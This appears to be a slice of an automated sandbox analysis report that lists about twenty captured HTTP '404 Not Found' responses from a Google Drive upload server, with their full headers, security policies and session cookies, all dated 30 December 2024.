                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5r8jFWtqrVC47XzG0fLubod6JG3bxMGlzbjdG6MT86GGvmDeWf1cnhr2RzOiOCJsXtContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:10 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-7bGKJL25SjQ8hx360BBjSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E; expires=Tue, 01-Jul-2025 09:58:10 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC663tgRnkqqN787wYQ3matvlwMsm5wevAfHC0S5rpdEh5DDnXrgF4qXbAR8WR5q7adbtZSHZDgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:10 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-QxegUZUaDyF2AlpyjvksSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD; expires=Tue, 01-Jul-2025 09:58:10 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7MB96Lkeyx-FmIhD6UNY6xLL_0ATJUp6WjydE2YeNEHkUQghgIaSY9soQegw1aSSV-zNCBMEAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:12 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-CxH4l8hdfzGl71dsvLTM4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6NMLRHlDvMCwZgKHVP5rlVmEhMYQ4sLEMPkEYhfyx5db-ZyxVKrkD84OTppLFQVmvoa2NDs3QContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:12 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-ORfyBdHrLrMdeY0qdqHFzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5AOL74zv-hlk21_mu6JxTLEASaWA00KGlRxggioFhkrSNgbvC1B6yH_UyI_vR1X4xEN9QCbucContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:13 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Ok5LwymeUelLvwC6aVTEnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6XGEDuor3Rsh9ZrXcNbgz8MfekLoJTosk-7HBTA4vzKwT3JPsUaK5ouyhHXwTWp7Y2sOkQsQoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:13 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xTW9A0qlftiWXYHqlji5Xw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7dskQjPM8EtBLj7DI219i3hc14ASKktY4H4FjGGOJ5TukjBE9GnF1JC8ZQzMt0b64_IChyvrgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:14 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-zMmt71LQvMD38aLi5pSu-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6UywZIBLsum1uqUkxN4QyXm2YELCF5fDptiFS8ZajQEybXSaKbR2D90dgXIHtEzbKAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:14 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZhvleVkG8FNxXc00zDN89g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7zaqHxWQ2xdr4v62YA1pchjlXaICEySCb7Qg71mzdE5paMr8e6tuntIeD3tqDqJni1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:17 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_pn05JeS1kQVyYlxCKXoow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4p0hWHWv7KI4Ft1cdauagpWlOTLJFun9qaAYvI5GDzkFo6e0YjBJgiC43nkc5FNQCf3b1A0JkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:17 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-XozYoz5MesEU26y0NyLlPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC74tOTfK3xh63szB0FWh97khp52veaamqBE0N4LV0JFJJivhcSA3O42nM1R4Z3EHPvm0McxCUsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:18 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-B_-sPSOJbDgfwMC_Xg7Ykg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Ul7kuMC_3LQEKEYdaFNC8_j61Um0ubERqr313NXVfL5grqy6G-eWArcBr_zElQi5SContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:18 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jQzkyXDDxxo1_sDqOABQdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6s_dRA2fLEE3QSoe1pongHReCpGlnZnEdP9A89uQ9xOza9id05mzBFWhzUHs8qZXFrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:19 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-Y6PVv7T7qoZVk8Qvg8JQ-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5N7Baauisth124WrNKUVfTFxwn2nSKb6mzl_piLSobAHqe5vTy0WUT_FOzCk3iBpr5Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:19 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HcGWl0t4NIr10LZFH2yJ-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7zuWiKJQTHXnttQDVbw_v_-VHjrZHZbUobR-BvkG9YNsHvi0SHjoe8RaitX84Ero2PContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:22 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GybVQ_S-ZNCktUf_OZ61mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ygkEC0aDN4Nk81-Wf6EOAEAw3qrWlkwtwdP_iBVCuoLvebXpIEFSEhW3VCANaMT2TRkQiE1wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:22 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-lJzX9Aocll-xsiSZ8BK1_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5QOhT1Ox-1IHWQdpOEuqjpxKxca3vIU_qv37XMUzorx8_8ntkxU8Pik9yFn1VFGR5rContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:23 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VBMMo4tlhytV7m-JeknI8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6rzlygiI9AhK3gEbQ2zj7iCtVImLxGbukstL1rQ3AyVKcSX4MebzIUqYxmxxVcWGe1KIW1JmAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:23 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GS_ZIsRWBWht0cF8QZUp_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6pTz7_MLMcLZK6PSRD0oDQjbhRC1HbAnijRFNAp-meyCWeqEuZ2t-GRn_KmU9jupXAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:24 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-4OSBAfeO74D_gU4nrxBmNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
